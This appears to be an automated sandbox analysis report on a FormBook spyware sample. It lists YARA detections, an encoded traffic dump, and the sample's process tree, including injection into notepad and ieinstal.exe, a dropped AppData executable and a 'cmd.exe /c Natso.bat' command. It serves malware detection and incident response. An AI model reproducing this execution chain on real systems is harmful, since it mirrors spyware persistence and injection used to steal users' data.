73 50 57 4f 49 4d 63 46 57 56 6e 73 38 39 61 47 65 7a 65 38 64 74 79 44 33 6a 6a 6b 79 6c 4b 70 69 33 73 68 61 46 59 34 4b 47 47 65 49 41 76 63 41 58 75 5a 68 4e 75 70 31 35 5a 71 47 52 39 70 35 75 37 69 32 77 32 63 52 59 34 77 71 56 34 42 70 43 4a 56 6d 52 38 6e 69 38 49 5a 34 73 78 39 52 31 6a 5f 65 49 67 46 68 59 67 73 61 51 36 37 6e 45 7e 55 56 32 41 79 32 39 55 54 62 30 62 6e 6e 54 7e 6a 73 71 7a 43 4e 63 64 33 34 4b 57 78 38 72 57 2d 37 4a 6a 6b 6f 5f 79 69 5a 48 32 70 30 54 53 67 62 64 69 32 6e 71 6d 47 58 4e 35 55 4b 63 55 41 65 58 56 48 49 56 36 41 7a 72 69 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
ATxxQxK=5zCUsJ6OMD4dQ9Owl3SswRCMwOrHMvhwbq~Ch6aAqX(vK0u8DZs-1-HsSvNdkDJ_lpKRenl4PciULdXXIUmzCwCvzVRbhcjmvGYi93rgfifZryy8lwaIroriK55eRo8tOuU01v7M1A8xRkJGUhUbwgw_XuDHyp5wktI_GhysUjiBey2N0JTfZa0qSEvz6bub(9GsXHfdpYU3Km4yIZsPWOIMcFWVns89aGeze8dtyD3jjkylKpi3shaFY4KGGeIAvcAXuZhNup15ZqGR9p5u7i2w2cRY4wqV4BpCJVmR8ni8IZ4sx9R1j_eIgFhYgsaQ67nE~UV2Ay29UTb0bnnT~jsqzCNcd34KWx8rW-7Jjko_yiZH2p0TSgbdi2nqmGXN5UKcUAeXVHIV6AzriA).
Urls found in memory or binary data

- Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com
- Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
- Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml
- Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com
- Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers
- Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
- Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
- Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
- Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
- Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
- Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
- Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com
- Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn
- Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
- Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
- Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
- Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
- Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr
- Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
- Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com
- Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com
- Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr
- Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com
- Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD
- Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease
- Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Uses HTTPS

- Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49741
- Source: unknown Network traffic detected: HTTP traffic on port 49741 -> 443
- Source: unknown Network traffic detected: HTTP traffic on port 49724 -> 443
- Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49739
- Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49724
- Source: unknown Network traffic detected: HTTP traffic on port 49739 -> 443

### E-Banking Fraud:

Yara detected FormBook

- Source: Yara match File source: 0000001D.00000002.399135517.0000000003800000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match File source: 00000019.00000002.474955241.0000000000910000.00000004.00000001.sdmp, type: MEMORY
- Source: Yara match File source: 00000019.00000002.474675547.00000000007D0000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match File source: 00000009.00000002.343939921.00000000009A0000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match File source: 0000001E.00000002.397779969.0000000000F30000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match File source: 00000019.00000002.471509129.0000000000450000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match File source: 0000001D.00000002.395148815.0000000000400000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match File source: 00000009.00000002.344896529.0000000002B30000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match File source: 00000009.00000002.343414825.0000000000400000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match File source: 0000001D.00000002.397372666.0000000003490000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match File source: 29.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE
- Source: Yara match File source: 9.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE
- Source: Yara match File source: 9.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE
- Source: Yara match File source: 29.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE

### System Summary:

Detected FormBook malware

Malicious sample detected (through community Yara rule)

- Source: 0000001D.00000002.399135517.0000000003800000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
- Source: 0000001D.00000002.399135517.0000000003800000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
- Source: 00000019.00000002.474955241.0000000000910000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
- Source: 00000019.00000002.474955241.0000000000910000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
- Source: 00000019.00000002.474675547.00000000007D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
- Source: 00000019.00000002.474675547.00000000007D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
- Source: 00000009.00000002.343939921.00000000009A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
- Source: 00000009.00000002.343939921.00000000009A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
- Source: 0000001E.00000002.397779969.0000000000F30000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
- Source: 0000001E.00000002.397779969.0000000000F30000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
- Source: 00000019.00000002.471509129.0000000000450000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
- Source: 00000019.00000002.471509129.0000000000450000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
- Source: 0000001D.00000002.395148815.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
- Source: 0000001D.00000002.395148815.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
- Source: 00000009.00000002.344896529.0000000002B30000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
- Source: 00000009.00000002.344896529.0000000002B30000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
- Source: 00000009.00000002.343414825.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
- Source: 00000009.00000002.343414825.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
- Source: 0000001D.00000002.397372666.0000000003490000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
- Source: 0000001D.00000002.397372666.0000000003490000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
- Source: 29.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE Matched
rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 29.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 9.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 9.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 9.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 9.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 29.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 29.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Contains functionality to call native functions
Detected potential crypto function
- Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_00401030
- Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_0041D97B
- Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_0041DADA
- Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_0041DBC0
- Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_00402D90
- Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_0041DDA4
- Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_0041E654
- Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_0041DE0B
- Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_00409E2E
- Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_00409E30
- Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_0041CEE3
- Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_0041CEE6
- Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_0041DEFF
- Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_0041DF1F
- Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_00402FB0
- Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_0319EBB0
- Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_0316F900
- Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_03184120
- Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_03221002
- Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_0317B090
- Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_031920A0
- Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_03186E30
- Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_03160D20
- Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_03231D55
- Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_03192581
- Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_0317D5E0
- Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_0317841F
- Source: C:\Users\user\AppData\Local\Mqbmnet.exe Code function: 19_3_04B26EB0
- Source: C:\Users\user\AppData\Local\Mqbmnet.exe Code function: 19_3_04B26EB0
- Source: C:\Users\user\AppData\Local\Mqbmnet.exe Code function: 19_3_04B26EB0
- Source: C:\Users\user\AppData\Local\Mqbmnet.exe Code function: 19_3_04B26EB0
- Source: C:\Users\user\AppData\Local\Mqbmnet.exe Code function: 19_3_04B26EB0
- Source: C:\Users\user\AppData\Local\Mqbmnet.exe Code function: 19_3_04B26EB0
- Source: C:\Users\user\AppData\Local\Mqbmnet.exe Code function: 19_3_04B26EB0
- Source: C:\Users\user\AppData\Local\Mqbmnet.exe Code function: 19_3_04B26EB0
Found potential string decryption / allocating functions
- Source: C:\Windows\SysWOW64\notepad.exe Code function: String function: 50484224 appears 50 times
- Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exe Code function: String function: 0231C890 appears 48 times
- Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: String function: 0316B150 appears 32 times
- Source: C:\Users\user\AppData\Local\Mqbmnet.exe Code function: String function: 04B2B4A4 appears 32 times
- Source: C:\Users\user\AppData\Local\Mqbmnet.exe Code function: String function: 04B23AF4 appears 40 times
PE / OLE file has an invalid certificate
- Source: Mqbmupv_Signed_.exe Static PE information: invalid certificate
PE file contains strange resources
- Source: Mqbmupv_Signed_.exe Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
- Source: Mqbmupv_Signed_.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
- Source: Mqbmnet.exe.0.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
- Source: Mqbmnet.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Sample file is different than original file name gathered from version info
- Source: Mqbmupv_Signed_.exe, 00000000.00000000.204808352.0000000000465000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameYes( vs Mqbmupv_Signed_.exe
Yara signature match
Classification label
- Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@24/9@5/5
Contains functionality to check free disk space
- Source: C:\Windows\SysWOW64\notepad.exe Code function: 2_2_5048784E GetDiskFreeSpaceA,
Creates files inside the user directory
Creates mutexes
- Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6436:120:WilError_01
- Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5824:120:WilError_01
Executes batch files
- Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Natso.bat
Parts of this application are using Borland Delphi (probably coded in Delphi)
- Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
- Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
- Source: C:\Windows\SysWOW64\notepad.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
- Source: C:\Users\user\AppData\Local\Mqbmnet.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
- Source: C:\Users\user\AppData\Local\Mqbmnet.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
- Source: C:\Users\user\AppData\Local\Mqbmnet.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
- Source: C:\Users\user\AppData\Local\Mqbmnet.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
- Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Reads the hosts file
Sample is known by Antivirus
- Source: Mqbmupv_Signed_.exe Virustotal: Detection: 27%
- Source: Mqbmupv_Signed_.exe ReversingLabs: Detection: 45%
Sample reads its own file content
Spawns processes
- Source: unknown Process created: C:\Users\user\Desktop\Mqbmupv_Signed_.exe 'C:\Users\user\Desktop\Mqbmupv_Signed_.exe'
- Source: unknown Process created: C:\Windows\SysWOW64\notepad.exe C:\Windows\System32\Notepad.exe
- Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Natso.bat
- Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
- Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
- Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Natso.bat
- Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
- Source: unknown Process created: C:\Users\user\AppData\Local\Mqbmnet.exe 'C:\Users\user\AppData\Local\Mqbmnet.exe'
- Source: unknown Process created: C:\Users\user\AppData\Local\Mqbmnet.exe 'C:\Users\user\AppData\Local\Mqbmnet.exe'
- Source: unknown Process created: C:\Windows\SysWOW64\autochk.exe C:\Windows\SysWOW64\autochk.exe
- Source: unknown Process created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
- Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
- Source: unknown Process created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
- Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
- Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exe Process created: C:\Windows\SysWOW64\notepad.exe C:\Windows\System32\Notepad.exe
- Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
- Source: C:\Windows\SysWOW64\notepad.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Natso.bat
- Source: C:\Windows\SysWOW64\notepad.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Natso.bat
- Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Mqbmnet.exe 'C:\Users\user\AppData\Local\Mqbmnet.exe'
- Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Mqbmnet.exe 'C:\Users\user\AppData\Local\Mqbmnet.exe'
- Source: C:\Users\user\AppData\Local\Mqbmnet.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
- Source: C:\Users\user\AppData\Local\Mqbmnet.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Uses an in-process (OLE) Automation server
- Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}\InProcServer32
Writes ini files